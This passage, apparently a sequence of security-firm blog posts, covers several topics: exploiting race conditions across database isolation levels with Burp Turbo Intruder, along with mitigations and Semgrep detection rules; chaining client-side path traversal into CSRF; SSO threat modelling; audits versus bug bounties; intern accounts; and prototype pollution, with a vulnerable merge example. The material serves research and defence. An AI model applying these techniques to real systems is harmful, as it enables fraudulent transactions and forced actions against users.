All of these were performed using BurpSuite’s extensions: “Intruder” for (1) and “Turbo Intruder” for (2) and (3).

Using this setup, we attacked the application by performing 20 requests using 10 threads/connections, transferring an amount of 50 from Bob (account ID 2 with a starting balance of 200) to Alice. Once the attack was done, we noted the number of accepted requests. Given a non-vulnerable application, there shouldn’t be more than 4 accepted requests.

This was performed 10 times, for each combination of application/database/attack method. The number of successfully processed requests was noted. From those numbers we conclude if a specific isolation level is exploitable or not. Those results can be found here.

Results and Observations

Our testing showed that if this pattern is present in an application, it is very likely that it can be exploited. In all cases, except for the Serializable level, we were able to exceed the expected number of accepted requests, overdrawing the account. The number of accepted requests varies between different technologies, but the fact that we were able to exceed it (and in some cases, to a significant degree) is sufficient to demonstrate the exploitability of the issue.

If an attacker is able to get a large number of request to the server in the same instant, effectively creating conditions of a local access, the number of accepted requests jumps up by a significant amount. So, to maximize the possibility of hitting the race window, testers should prefer methods such as last-byte sync or the single packet attack.

One outlier is Postgres’ Repeatable Read level. The reason it’s not vulnerable is that it implements an isolation level called Snapshot Isolation. The guarantees provided by this isolation level sit between Repeatable Read and Serializable, ultimately providing sufficient protection and mitigating the race conditions for our example.

The languages concurrency modes did not have any notable impact on the exploitability of the race condition.

Mitigation

On a conceptual level, the fix only requires the start of the critical section to be moved to the beginning of the transaction. This will ensure that the transaction which first reads the entry gets exclusive access to it and is the only one allowed to commit. All others will wait for its completion.

Mitigation can be implemented in a number of ways. Some of them require manual work, while others come out of the box, provided by the database of choice. Let’s start by looking at the simplest and generally preferred way: setting the transaction isolation level to Serializable.

As mentioned before, the isolation level is a user/developer controlled property of a database transaction. It can be set by simply specifying it when creating a transaction:

BEGIN TRANSACTION SET TRANSACTION ISOLATION LEVEL SERIALIZABLE

This may slightly vary from database to database, so it’s always best to consult the appropriate documentation. Usually ORMs or database drivers provide an application level interface for setting the desired isolation level. Postgres’ Go driver pgx allows users to do the following:

tx, err := conn.BeginTx(ctx, pgx.TxOptions{IsoLevel: pgx.Serializable})

It is worth noting that Serizalizable, being the highest isolation level, may have an impact of the performance of your application. However, its use can be limited to only the business-critical transaction. All other transactions can remain unchanged and be executed with the database’s default isolation level or any appropriate level for that particular operation.

One alternative to this method is implementing pessimistic locking via manual locking. The idea behind this method is that the business-critical transaction will obtain all required locks at the beginning and only release them when the transaction completes or fails. This ensures that no other concurrently executing transaction will be able to interfere. Manual locking can be performed by specifying the FOR SHARE or FOR UPDATE options your SELECT operations:

SELECT id, name, balance FROM users WHERE id = 1 FOR UPDATE

This will instruct the database to place a shared or exclusive lock, respectively, to all entries returned by the read operation, effectively disallowing any modification to it until the lock is released. This method can, however, be error prone. There is always a possibility that other operations may get overlooked or new ones will be added without the FOR SHARE / FOR UPDATE option, potentially re-introducing the data race. Additionally, scenarios such as the one shown below, may be possible at lower isolation levels.

The graph shows a scenario where ‘tx2’ performs validation on a value which becomes stale after tx1 commits, and ends up overwriting the update performed by tx1, leading to a Lost Update.

Finally, mitigation can also be implemented using optimistic locking. The conceptual opposite of pessimistic locking, optimistic locking expects that nothing will go wrong and only performs conflict detection at the end of the transaction. If a conflict is detected (i.e., underlining data was modified by a concurrent transaction), the transaction will fail and will need to be retried. This method is usually implemented using a logic clock, or a table column, whose value must not change during the execution of the transaction.

The simplest way to implement this is by introducing a version column in your table:

CREATE TABLE users(
  id INT PRIMARY KEY NOT NULL AUTO_INCREMENT, 
  name TEXT NOT NULL, 
  balance INT NOT NULL,
  version INT NOT NULL AUTO_INCREMENT
);

The value of the version column must then be always verified when performing any write/update operations to the database. If the value changed, the operation will fail, failing the entire transaction.

UPDATE users SET balance = 100 WHERE id = 1 AND version = <last_seen_version>

Detection

If the application uses an ORM, setting the isolation level would usually entails calling a setter function, or supplying it as a function parameter. On the other hand, if the application constructs database transactions using raw SQL statements, the isolation level will be supplied as part of the transaction’s BEGIN statement.

Both those methods represent a pattern which can be search for using tools such as Semgrep. So, if we assume that our application is build using Go and uses the pgx to access to data stored in a Postgres database, we can use the following Semgrep rules to detect instances of unspecified isolation levels.

1. Raw SQL Transaction

rules:
  - id: pgx-sql-tx-missing-isolation-level
    message: "SQL transaction without isolation level"
    languages:
      - go
    severity: WARNING
    patterns:
      - pattern: $CONN.Exec($CTX, $BEGIN)
      - metavariable-regex:
          metavariable: $BEGIN
          regex: ("begin transaction"|"BEGIN TRANSACTION")

2. Missing pgx Transaction Creation Options

rules:
  - id: pgx-tx-missing-options
    message: "Postgres transaction options not set"
    languages:
      - go
    severity: WARNING
    patterns:
      - pattern: $CONN.BeginTx($CTX)

3. Missing Isolation Level in pgq Transaction Creation Options

rules:
  - id: pgx-tx-missing-options-isolation
    message: "Postgres transaction isolation level not set"
    languages:
      - go
    severity: WARNING
    patterns:
      - pattern: $CONN.BeginTx($CTX, $OPTS)
      - metavariable-pattern:
          metavariable: $OPTS
          patterns:
            - pattern-not: >
                $PGX.TxOptions{..., IsoLevel:$LVL, ...}

All these patterns can be easily modified to suit you tech-stack and database of choice.

It’s important to note that rules like these are not a complete solution. Integrating them blindly into an existing pipeline will result in a lot of noise. We would rather recommend using them to build an inventory of all transactions the application performs, and use that information as a starting point to review the application and apply hardening if it is required.

Closing Thoughts

To finish up, we should emphasize that this is not a bug in database engines. This is part of how isolation levels were designed and implemented and it is clearly described in both the SQL specification and dedicated documentation for each database. Transactions and isolation levels were designed to protect concurrent operations from interfering with each other. Mitigations against data races and race conditions, however, are not their primary use case. Unfortunately, we found that this is a common misconception.

While usage of transactions will help guard the application from data corruptions under normal circumstances, it is not sufficient to mitigate data races. When this insecure pattern is introduced in business-critical code (account management functionality, financial transactions, discount code application, etc.), the likelihood of it being exploitable is high. For that reason, review your application’s business-critical operations and verify that they are doing proper data locking.

Resources

This research was presented by Viktor Chuchurski (@viktorot) at the 2024 OWASP Global AppSec conference in Lisbon. The recording of that presentation can be found here and the presentation slides can be downloaded here.

Playground code can be found on Doyensec’s GitHub.

More information

Appendix - Testing Results

The table below shows which isolation level allowed race condition to happen for the databases we tested as part of our research.

	RU	RC	RR	S
MySQL	Y	Y	Y	N
Postgres	Y	Y	N	N
MariaDB	Y	Y	Y	N

Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF

2024-07-02T00:00:00+02:00

To provide users with a safer browsing experience, the IETF proposal named “Incrementally Better Cookies” set in motion a few important changes to address Cross-Site Request Forgery (CSRF) and other client-side issues. Soon after, Chrome and other major browsers implemented the recommended changes and introduced the SameSite attribute. SameSite helps mitigate CSRF, but does that mean CSRF is dead?

While auditing major web applications, we realized that Client Side Path-Traversal (CSPT) can be actually leveraged to resuscitate CSRF for the joy of all pentesters.

This blog post is a brief introduction to my research. The detailed findings, methodologies, and in-depth analysis are available in the whitepaper.

This research introduces the basics of Client-Side Path Traversal, presenting sources and sinks for Cross-Site Request Forgery. To demonstrate the impact and novelty of our discovery, we showcased vulnerabilities in major web messaging applications, including Mattermost and Rocket.Chat, among others.

Finally, we are releasing a Burp extension to help discover Client-Side Path-Traversal sources and sinks.

Thanks to the Mattermost and Rocket.Chat teams for their collaboration and authorization to share this.

Client-Side Path Traversal (CSPT)

Every security researcher should know what a path traversal is. This vulnerability gives an attacker the ability to use a payload like ../../../../ to read data outside the intended directory. Unlike server-side path traversal attacks, which read files from the server, client-side path traversal attacks focus on exploiting this weakness in order to make requests to unintended API endpoints.

While this class of vulnerabilities is very popular on the server side, only a few occurrences of Client-Side Path Traversal have been widely publicized. The first reference we found was a bug reported by Philippe Harewood in the Facebook bug bounty program. Since then, we have only found a few references about Client-Side Path Traversal:

a tweet from Sam Curry back in 2021
1-click CSRF in GitLab by Johan Carlsson
CSS Injection by Medi, nominated in the Portswigger Top 10 Web hacking techniques of 2022
a CSRF by Antoine Roly from Erasec
Some other references were found about Client-Side CSRF from OWASP and in this research paper by Soheil Khodayari and Giancarlo Pellegrino.

Client Side Path-Traversal has been overlooked for years. While considered by many as a low-impact vulnerability, it can be actually used to force an end user to execute unwanted actions on a web application.

Client-Side Path Traversal to Perform Cross-Site Request Forgery (CSPT2CSRF)

This research evolved from exploiting multiple Client-Side Path Traversal vulnerabilities during our web security engagements. However, we realized there was a lack of documentation and knowledge to understand the limits and potential impacts of using Client-Side Path Traversal to perform CSRF (CSPT2CSRF).

Source

While working on this research, we figured out that one common bias exists. Researchers may think that user input has to be in the front end. However, like with XSS, any user input can lead to CSPT (think DOM, Reflected, Stored):

URL fragment
URL Query
Path parameters
Data injected in the database

When evaluating a source, you should also consider if any action is needed to trigger the vulnerability or if it’s triggered when the page is loaded. Indeed, this complexity will impact the final severity of the vulnerability.

Sink

The CSPT will reroute a legitimate API request. Therefore, the attacker may not have control over the HTTP method, headers and body request.

All these restrictions are tied to a source. Indeed, the same front end may have different sources that perform different actions (e.g., GET/POST/PATCH/PUT/DELETE).

Each CSPT2CSRF needs to be described (source and sink) to identify the complexity and severity of the vulnerability.

As an attacker, we want to find all impactful sinks that share the same restrictions. This can be done with:

API documentation
Source code review
Semgrep rules
Burp Suite Bambda filter

CSPT2CSRF with a GET Sink

Some scenarios of exploiting CSPT with a GET sink exist:

Using an open redirect to leak sensitive data associated with the source
Using an open redirect to load malicious data in order to trigger an XSS

However, open redirects are now hunted by many security researchers, and finding an XSS in a front end using a modern framework may be hard.

That said, during our research, even when stage-changing actions weren’t implemented directly with a GET sink, we were frequently able to exploit them via CSPT2CSRFs, without having the two previous prerequisites.

In fact it is often possible to chain a CSPT2CSRF having a GET sink with another state-changing CSPT2CSRF.

1st primitive: GET CSPT2CSRF:

Source: id param in the query
Sink: GET request on the API

2nd primitive: POST CSPT2CSRF:

Source: id from the JSON data
Sink: POST request on the API

To chain these primitives, a GET sink gadget must be found, and the attacker must control the id of the returned JSON. Sometimes, it may be directly authorized by the back end, but the most common gadget we found was to abuse file upload/download features. Indeed, many applications exposed file upload features in the API. An attacker can upload JSON with a manipulated id and target this content to trigger the CSPT2CSRF with a state-changing action.

In the whitepaper, we explain this scenario with an example in Mattermost.

This research was presented last week by Maxence Schmitt (@maxenceschmitt) at OWASP Global Appsec Lisbon 2024. The slides can be found here.

This blog post is just a glimpse of our extensive research. For a comprehensive understanding and detailed technical insights, please refer to the whitepaper.

Along with this whitepaper, we are releasing a BURP extension to find Client-Side Path Traversals.

In Conclusion

We feel CSPT2CSRF is overlooked by many security researchers and unknown by most front-end developers. We hope this work will highlight this class of vulnerabilities and help both security researchers and defenders to secure modern applications.

More information

Single Sign-On Or Single Point of Failure?

2024-06-20T00:00:00+02:00

No one can argue with the convenience that single sign-on (SSO) brings to users or the security and efficiency gains organizations reap from the lower administrative overhead. Gone are the days of individually managing multiple user accounts across numerous services. That said, have we just put all our eggs in one proverbial basket with regards to our SSO implementations? The results of our latest research remind us of why the saying cautions against doing this.

Threat modeling an IdP compromise

To help organizations assess their exposure in the event of an IdP compromise, we’re publishing a whitepaper that walks through these potential impacts. It examines how they differ depending on the privileges involved with the compromise. This includes the surprising impacts that even an unprivileged IdP account can have, all the way up to the complete disaster caused by a fully compromised IdP.

As part of our continuing collaboration with Teleport, our Francesco Lacerenza (@lacerenza_fra) explored these scenarios and how they apply to it specifically. If you’re not familiar with it, “The Teleport Access Platform is a suite of software and managed services that delivers on-demand, least-privileged access to infrastructure on a foundation of cryptographic identity and Zero Trust…”, thereby integrating robust authentication and authorization throughout an infrastructure.

Defense and Detection

As our motto is “Build with Security”, we help organizations build more secure environments, so we won’t leave you hanging with nightmares about what can go wrong with your SSO implementation. As part of this philosophy, the research behind our whitepaper included creating a number of Teleport hardening recommendations to protect your organization and limit potential impacts, in even the worst of scenarios. We also provide detailed information on what to look for in logs when attempting to detect various types of attacks. For those seeking the TL;DR, we are also publishing a convenient hardening checklist, which covers our recommendations and can be used to quickly communicate them to your busy teams.

More Information

Be sure to download the whitepaper (here) and our checklist (here) today! If you would like to learn more about our other research, check out our blog, follow us on X (@doyensec) or feel free to contact us at info@doyensec.com for more information on how we can help your organization “Build with Security”.

Product Security Audits vs. Bug Bounty

2024-05-02T00:00:00+02:00

Every so often we see people discussing whether they still need to have product security audits (commonly referred to as pentests) because they have a bug bounty program. While the answer to this seems clear to us, it nonetheless is a recurring topic of discussion, particularly in the information security corners of social media. We’ve decided to publish our thoughts on this topic to clarify it for those who might still be unsure.

Defining the approaches

Product Security Audit

What we refer to as a product security audit is a time-bound project, where one or more engineers focus on a particular application exclusively. The testing is performed by employees of an application security firm. This work is usually scoped ahead of time and billed at flat hourly/daily rates, with the total cost known to the client prior to commencing.

These can be white box (i.e., access to source code and documentation) or black box (i.e., no source code access, with or without documentation), or somewhere in the middle. There is usually a well-defined scope and often preliminary discussions on points of interest to investigate more closely than others. Frequently, there will also be a walkthrough of the application’s functionality. More often than not, the testing takes place in a predefined set of days and hours. This is typically when the client is available to respond to questions, react in the event of potential issues (e.g., a site going down) or possibly to avoid peak traffic times.

Because of the trust that clients have in professional firms, they will often permit them direct access to their infrastructure and code - something that is generally never done in a bug bounty program. This empowers the testers to find bugs that are potentially very difficult to find externally and things that may be out of scope for dynamic tests, such as denial-of-service vulnerabilities. Additionally, with this approach, it’s common to discover one vulnerability, only to then quickly discover it’s a systemic issue specifically because of the access to the code. With this access, it is also much easier to identify things like vulnerable dependencies, often buried deep in the application.

Once the testing is complete, the provider will usually supply a written report and may have a wrap-up call with the client. There may also be a follow-up (retest) to ensure a client’s attempts at remediation have been successful.

Bug Bounty Programs

What is most commonly referred to as a bug bounty program is typically an open-ended, ongoing effort where the testing is performed by the general public. Some companies may limit participation to a smaller group, permitting participation on whatever criteria they wish, with past performance in other programs being a commonly used factor.

Most programs define a scope of things to be tested and the vulnerability types that they are interested in receiving reports on. The client typically sets the payout amounts they are offering, with escalating rewards for more impactful discoveries. The client is also free to incentivize testing on certain areas through promotions (e.g., double bounties on their new product). Most bug bounty programs are exclusively black box, with no source code or documentation provided to the participating testers.

In most programs, there are no limits as to when the testing occurs. The participants determine if and when they perform testing. Because of this, any outages caused by the testing are usually treated as either normal engineering outages or potentially as security incidents. Some programs do ask their testers to identify their traffic via various means (e.g., passing a unique header) to more easily understand what they’re seeing in logs, if questions arise.

The bug bounty program’s concept of reporting is commonly individual bug reports, with or without a pre-formatted submission form. It is also common for programs to request that the person submitting the report validate the fix.

Hybrid Approaches

While not the focus of this post, we felt it was necessary to also acknowledge that there are hybrid approaches available. These offerings combine various aspects of both a bug bounty program and focused product security audits. We hope this post will inform the reader well enough to ensure they select the approach and mix of services that is right for their organization and fully understand what each entails.

Contrasting the approaches

From the definitions, the two approaches seem reasonably similar, but when we go below the surface, the differences become more apparent.

The people

It’s not fair to paint any group with a broad brush, but there are some clear differences between who typically works in a product security audit versus a bug bounty program. Both approaches can result in great people testing an application and both could potentially result in participants lacking the professionalism and/or skill set you hoped for.

When a firm is retained to perform testing for a client, the firm is staking their reputation on the client’s satisfaction. Most reputable firms will attempt to provide clients with the best people they have available, ideally considering their specific skills for the engagement. The firm assumes the responsibility to screen their employees’ technical abilities, usually through multiple rounds of testing and interviewing prior to hiring, along with ongoing supervision, training and mentoring. Clients are also often provided with summaries of the engineers’ résumés, with the option to request alternate testers, if they feel their background doesn’t match with the project. Lastly, providers are also usually required to perform criminal background checks on their staff to meet client requirements.

A Bug Bounty program usually has very minimal entry requirements. Typically this just means that the participants are not from embargoed countries. Participants could be anyone from professionals looking to make extra money, security researchers, college students or even complete novices looking to build a résumé. While theoretically a client may draw more eyes to their project than in a typical audit, that’s not guaranteed and there are no assurances of their qualifications. Katie Moussouris, a well-known CEO of a bug bounty consultancy, is quoted underscoring this point, saying “Their latest report shows most registered users are basically either fake or unskilled”. Further, per their own statistics, one of the largest platforms stated that only about one percent of their participants “were really doing well”. So, despite large potential numbers, the small percentage of productive participants will be stretched thinly across thousands of programs, at best. In reality, the top participants tend to aggregate around programs they feel are the most lucrative or interesting.

The process

When a client hires a quality firm to perform a product security audit, they’re effectively getting that firm’s collective body of knowledge. This typically means that their personnel have others within the company they can interact with if they encounter problems or need assistance. This also means that they likely have a proprietary methodology they adhere to, so clients should expect thorough and consistent results. Internal peer review and other quality assurance processes are also usually in place to ensure satisfactory results.

Generally, there are limitations on what a client wants or is able to share externally. It is common that a firm and client sign mutual NDAs, so neither party is allowed to disclose information about the audit. Should the firm leak information, they can potentially be held legally liable.

In a bug bounty program, each tester makes their own rules. They may overlap each other, creating repeated redundant tests, or they may compliment each other, giving the presumed advantage of many eyes. There is generally no way for a client to know what has or has not been tested. Clients may also find test accounts and data littered throughout the app (e.g., pop-up alerts everywhere), whereas professional testers are typically more restrained and required to not leave such remnants.

Most bug bounty programs don’t require a binding NDA, even if they are considered “private”. Therefore, clients are faced with a decision as to what and how much to share with the program participants. As a practical matter, there is little recourse if a participant decides to share information with others.

The results

When a client hires a firm, they should expect a well-written professional report. Most firms have a proprietary reporting format, but will usually also provide a machine-readable report upon request. In most cases, clients can preview a sample report prior to hiring a firm, so they can get a very clear picture of the deliverables.

Reports from professional audits are typically subjected to several rounds of quality control prior to being delivered to clients. This will typically include a technical review or validation of reported issues, in addition to language and grammar editing to ensure reports are readable and professionally constructed. Additionally, quality firms also understand the fact that the results may be reviewed by a wide audience at their clients. They will therefore invest the time and effort to construct them in such a way that an audience, with a wide range of technical knowledge, are all able to understand the results. Testers are also typically required to maintain testing logs and quality documentation of all issues (e.g., screenshots - including requests and responses). This ensures clear findings reports and reproduction steps along with all the supporting materials.

Through personalized relationships with clients and potentially their source code, firms have the opportunity to understand what is important to them, which things keep them up at night and which things they aren’t concerned about. Through kickoff meetings, ongoing direct communication and wrap-up meetings, firms build trust and understanding with clients. This allows them to look at vulnerabilities of all severity levels and understand the context for the client. This could result in simply saving the client’s time or recognizing when a medium severity issue is actually a critical issue, for that client’s organization.

Further, repeated testing allows a client to tangibly demonstrate their commitment to security and how quickly they remediate issues. Additionally, product security audits conducted by experienced engineers, especially those with source code access, can highlight long-term improvements and hardening measures that can be taken, which would not generally be a part of a bug bounty program’s reports.

In a bug bounty program, the results are unpredictable, often seemingly driven mainly by the participants’ focus on payouts. Most companies end up inundated with effectively meaningless reports. Whether valid or not, they are often unrealistic, overhyped, known CVEs or previously known bugs, or issues the organization doesn’t actually care about. It is rare that results fully meet expectations, but not impossible. Submissions tend to cluster around things pushing (often quite imaginatively) to be considered critical or high severity, to gain the largest payouts or the low hanging fruits detected by automated scanners, usually reported by the lower rated participants looking for any type of payouts, no matter how trivial. The reality is that clients need to pay a premium to get the “good researchers” to participate, but on public programs that itself can also cause a significant uptick in “spam” reports.

Bug bounty reports are typically not formatted in a consistent manner and not machine-readable for ingestion into defect tracking software. Historically, there have been numerous issues that have arisen from reports which were difficult to triage due to language issues, poor grammar or bad proof-of-concept media (e.g., unhelpful screenshots, no logs, meandering videos). To address this, some platforms have gone as far as to incentivize participants to provide clear and easily readable reports via increased payouts, or positive reviews which impact the reporters’ reputation scores.

The value

A professional audit is something that produces a deliverable that a client can hand to a third-party, if necessary. While there is a fixed cost for it, regardless of the results, this documented testing is often required by partner companies and for compliance reasons. Furthermore, when using a reputable firm, a client may find it easier to pass the security requirements of their partners. Lastly, should there be an incident, a client can attest to their due diligence and potentially lessen their legal liability.

A bug bounty provides no assurances as to the amount of the application that is tested (i.e., the “coverage”). It neither produces an acceptable deliverable that can be offered to third parties, nor does it attest to the quality of the skills of those testing the application(s). Further, bug bounty programs don’t typically satisfy any compliance requirements with respect to testing requirements.

Summary

In the following table, we perform a side-by-side comparison of the two approaches to make the differences clearer.

Conclusion

Which approach an organization decides to take will vary based on many factors including budget, compliance requirements, partner requirements, time-sensitivity and confidentiality requirements. For most organizations, we feel the correct approach is a balanced one.

Ideally, an organization should perform recurring product security audits at least quarterly and after major changes. If budgets don’t permit that frequency of testing, the typical compromise is annually, at an absolute minimum.

Bug bounty programs should be used to fill the gaps between rigorous security audits, whether those audits are performed by internal teams or external partners. This is arguably the need they were designed to fill, rather than replacing recurring professional testing.

Internship Experiences at Doyensec

2024-03-22T00:00:00+01:00

The following blog post gives a voice to our 2023 interns and their experiences with us.

Aleandro

During my last high school year I took part in the Cyberchallenge.it program, whose goal is to introduce young students to the world of offensive cybersecurity, via lessons and CTFs competitions. After that experience, some friends and I founded the r00tstici CTF team, attempting to bring some cybersecurity culture to the south of Italy. We also organized various workshops and events at the University of Salento.

Once I moved from south of Italy to Pisa, to study at the university, I joined the fibonhack CTF team. I then also started working as a developer and penetration tester on small projects, both inside the university and outside.

Getting recruited

During April 2023, the Doyensec Twitter account posted a call for summer interns. Since I had been following Doyensec for months, after Luca’s talk at No Hat 2022, I submitted my application. This was both because I was bored with the university routine and because I also wanted to try a job in the research field. This was a good fit, since I was coming from an environment of development and freelance pentesting, alongside CTF competitions.

The selection process I went through has already been described, in large part, by Robert in his previous post about his internship experience. Basically it consisted of:

An interview with the Practice Manager
A technical challenge on both web and mobile topics
Finally, a technical interview with two different security engineers

The interview was about various aspects of application security. This ranged from web security to low level stuff like assembly and even CPU internals.

First weeks

The actual internship started with a couple of weeks of research, where I went through some web application frameworks in Rust. After completing that research, I then moved on to an actual pentest for a client. I remember the first week felt really different and challenging. The code base was so large and so filled with functionalities that I felt overwhelmed with things to test, ideas to try and scenarios to replicate. Despite the size and complexity, there were initially no vulnerabilities found. Impostor syndrome started to kick in.

Eventually, things started to improve during the second week of that engagement. While we’re a 100% remote company, sometimes we get together to work in small teams. That week, I worked in-person with Luca. He helped me understand that sometimes software is just well-written and well-architected from a security perspective. For those situations, I needed to learn how to deal with not having immediate success, the focus required for testing and how to provide value to the client despite having low severity findings. Thankfully, we eventually found good bugs in that codebase anyway :)

Research weeks

The main research topic of my internship experience was about developing internal tools. Although this project was not mainly about security, I enjoyed it a lot. Developing applications, fixing bugs and screaming about non-existent documentation is something I’ve done ever since I bought my first personal computer.

Responsibilities

It is important to note that even though you are the last one who has joined the company and have limited experience, all Doyensec team members treat you like all other employees. You could be in charge of actually talking with the client if you have any issues during an assessment, you will have to write and possibly peer review the reports, you will have to evaluate and assign severities to the vulnerabilities you’ve found, you will have your name on the report, and so on. Of course, you are assigned to work alongside more experienced engineers that will guide you through the process (Lorenzo in my case - who I would like to thank for helping me in managing the flexible schedule and for all the other advice he gave me). However, you learn the most by actually doing and making your own decisions on how to proceed and of course making errors.

To me this was a mind blowing feeling, I did not expect to be completely part of the team, and that my opinions would have mattered. It was really a good approach, in my opinion. It took me a while to fit entirely in the role, but then it was fun all along the way.

Leonardo

Hi, my name is Leonardo, some of you may better know me as maitai, which is the handle that I’ve been using in the CTF scene from the start of my journey. I encountered cybersecurity during my journey while earning my Bachelor of Science in computer science. From the very first moment I was amazed by it. So I decided to dig a bit more into hacking, starting with the PortSwigger Academy, which literally changed my life.

Getting recruited

If you have read the previous part of this blog post you have already met Aleandro. I knew him prior to joining Doyensec, since we played together on the same CTF team: fibonhack. While I was pursuing my previous internship, Aleandro and I talked a lot regarding our jobs and what to do in the near future. One day he told me that Doyensec would have an open internship position during the winter. I was a bit scared at first, just because it would be a really huge step for me to take on such a challenge. My previous internship had already ended when Doyensec opened the position. Although I was considering pursuing a master’s degree, I was still thinking about this opportunity all the time. I didn’t want to miss such a great opportunity, so I decided to submit my application. After all, what did I have to lose? I took it as a way to really challenge myself.

After a quick interview with the Practice Manager, I was made aware of the next steps in the interview process. First of all, the technical challenges used during the process were brand new. The Practice Manager told me that Doyensec had entirely renewed the challenges with a brand new platform and new challenges. I was essentially the first candidate to ever use this new platform.

The topics of the challenges were mostly web applications in several different languages, with different bugs to spot, alongside mobile challenges that involved the use of state-of-art technologies. I had 2 hours to complete as many challenges as I could, from a pool of 8. The time constraint was right in my opinion. You have around 15 minutes per challenge, which is a reasonable amount of time. Even though I wasn’t experienced with mobile hacking, I pushed myself to the limit in order to find as many bugs as possible and eventually to pass onto the next steps of the interview process. It was later explained to me that the review of numerous (but short) code snapshots in a limited time-frame is meant to simulate the complexity of reviewing larger codebases with several weeks at your disposal.

A couple of days after the technical challenges I received an email from Doyensec in which they congratulated me for passing the technical challenges. I was thrilled at that point! I literally couldn’t wait for what would come after that! The email stated that the next step was a technical call with Luca. I reserved a spot on his calendar and waited for the day of the interview.

Luca asked me several questions, ranging from threat modeling to how to exploit certain vulnerabilities, to how to patch vulnerable code. It was a 360 degree interview. It also included some live code review. The interview lasted for an hour or so, and in the end Luca said that he will evaluate my performance and he will let me know. The day after, another email arrived. I had advanced to the final step, the interview with John, Doyensec’s other co-founder. During this interview, he asked me about different things, not strictly related to the application security world. As I said before, they examined me from many angles. The meeting with John also lasted for an hour. At this point, I had completed the whole process. I only needed to wait for their response, which didn’t take too long to come.

They offered me the internship position. I did it! I was happy to have overcome the challenge that I set for myself. I quickly accepted the position in order to jump straight into the action!

First weeks

In my first weeks, I did a lot of different things including retesting web and network level bugs, in order to be sure that all the vulnerabilities previously found by other engineers were properly fixed. I also did standard web application penetration testing. The application itself was really interesting and complex enough to keep my eyes glued to the screen, without losing interest in it. Another amazing engineer was assigned to the aforementioned project with me, so I was not alone during testing.

Since Doyensec is a fully remote company, we also need to hold some meetings during the day, in order to synchronize on different things that can happen during the penetration test. Communication is a key part of Doyensec, and from great communication comes great bugs.

Research weeks

During the internship, you’re also given 50% of your time to perform application security R&D. During my research weeks I was assigned to an open source project. In fact, I was tasked to write some plugins for Google’s web security scanner Tsunami. This is a general purpose network security scanner, with an extensible plugins system for detecting high severity vulnerabilities with high confidence. Essentially, writing a plugin for Tsunami requires understanding a certain vulnerability in a product and writing an exploit for it, that can be used to confirm its existence when scanning. I was assigned to write two plugins which detect weak credentials on the RabbitMQ Management Portal and RStudio server. The plugins are written in Java, and since I’ve done a bit of Java programming during my Bachelor’s degree program I felt quite confident about it.

I really enjoyed writing those plugins and was also asked to write unit tests and a testbed that were used to actually reproduce the vulnerabilities. It was a really fun experience!

Responsibilities

As Aleandro already explained, interns are given a lot of responsibilities along with a great sense of freedom at Doyensec. I would add just one thing, which is about time management. This is one of the most difficult things for me to do. In a remote company, you don’t have time clocks or similar, so you can choose to work the way that you prefer. Luca told me several times that at Doyensec the output is what is evaluated. This is a big thing for me to deal with since I was used to work a fixed schedule. Doyensec gave me the flexibility to work in the way I prefer, which for me, is invaluable. That said, the activities are complex enough to keep you busy for several hours a day, but they are so enjoyable.

Conclusions

Being an intern at Doyensec is an awesome experience because it allows you to jump into the world of application security without the need for extensive job experience. You can be successful as long as you have the skills and knowledge, regardless of how you acquired them.

Moreover, during those three months you’ll be able to test your skills and learn new ones on different technologies across a variety of targets. You’ll also get to know passionate and skilled people, and if you’re lucky enough, take part in company retreats and get some exclusive swag.

In the end, you should consider applying for the next call for interns, if you:

are passionate about application security
have already good web security skills
have organizational capabilities
want scheduling flexibility
can manage remote work

If you’re interested in the role and think you’d make a good fit, apply via our careers page: https://www.careers-page.com/doyensec-llc. We’re now accepting candidates for the Summer Internship 2024.

A Look at Software Composition Analysis

2024-03-14T00:00:00+01:00

Background

At Doyensec, we specialize in performing white and gray box application security audits. So, in addition to dynamically testing applications, we typically audit our clients’ source code as well. This process is often software-assisted, with open source and off-the-shelf tools. Modern comprehensive versions of these tools offer the capabilities to detect the inclusion of vulnerable third-party libraries, commonly referred to as software composition analysis (SCA).

Three well-known tools in the SCA space are Snyk, Semgrep and Dependabot. The first two are stand-alone applications, with cloud components to them and the last is integrated into the GitHub(.com) environment directly. Since Security Automation is one of our core competencies, Doyensec has extensive experience with these tools, from writing custom detection rules for Semgrep, to assisting clients with selecting and deploying these types of tools in their SDLC processes. We have also previously published research into some of these, with regards to their Static Analysis Security Testing (SAST) capabilities. You can find those results here. After discussing this research directly with Semgrep, we were asked to perform an unbiased head-to-head comparison of the SCA functionality of these tools as well.

It’s time to ignore most of dependency alerts.

You will find the results of this latest analysis here on our research page. Included in that whitepaper, we describe the process taken to develop the testing corpus and our methodology. In short, the aim was to determine which tool could provide the most actionable and efficient results (i.e., high true positive rates), regardless of the false negative rates. This scenario was thought to be the optimal real-world scenario for most security teams, because most can’t afford to routinely spend hours or days chasing false positives. The person-hours required to triage low fidelity tools in the hopes of an occasional true positive are simply too costly for all but the largest teams in the most secure environments. Additionally, any attempts at implementing deployment blocking as a result of CI/CD testing are unlikely to tolerate more than a minimal amount of false positives.

More to Come

We hope you find the whitepaper comparing the tools informative and useful. Please follow our blog for more posts on current trends and topics in the world of application security. If you would like assistance with your application security projects, including security automation services, feel free to contact us at info@doyensec.com.

Unveiling the Prototype Pollution Gadgets Finder

2024-02-17T00:00:00+01:00

Introduction

Prototype pollution has recently emerged as a fashionable vulnerability within the realm of web security. This vulnerability occurs when an attacker exploits the nature of JavaScript’s prototype inheritance to modify a prototype of an object. By doing so, they can inject malicious code or alter an application to behave in unintended ways. This could potentially lead to sensitive information leakage, type confusion vulnerabilities, or even remote code execution, under certain conditions.

For those interested in diving deeper into the technicalities and impacts of prototype pollution, we recommend checking out PortSwigger’s comprehensive guide.

// Example of prototype pollution in a browser console
Object.prototype.isAdmin = true;
const user = {};
console.log(user.isAdmin); // Outputs: true

To fully understand the exploitation of this vulnerability, it’s crucial to know what “sources” and “gadgets” are.

Sources: A source in the context of prototype pollution refers to a piece of code that performs a recursive assignment without properly validating the objects involved. This action creates a pathway for attackers to modify the prototype of an object. The main sources of prototype pollution are:
- Custom Code: This includes code written by developers that does not adequately check or sanitize user input before processing it. Such code can directly introduce vulnerabilities into an application.
- Vulnerable Libraries: External libraries that contain vulnerabilities can also lead to prototype pollution. This often happens through recursive assignments that fail to validate the safety of the objects being merged or extended.

// Example of recursive assignment leading to prototype pollution
function merge(target, source) {
    for (let key in source) {
        if (typeof source[key] === 'object') {
            if (!target[key]) target[key] = {};
            merge(target[key], source[key]);
        } else {
            target[key] = source[key];
        }
    }
}

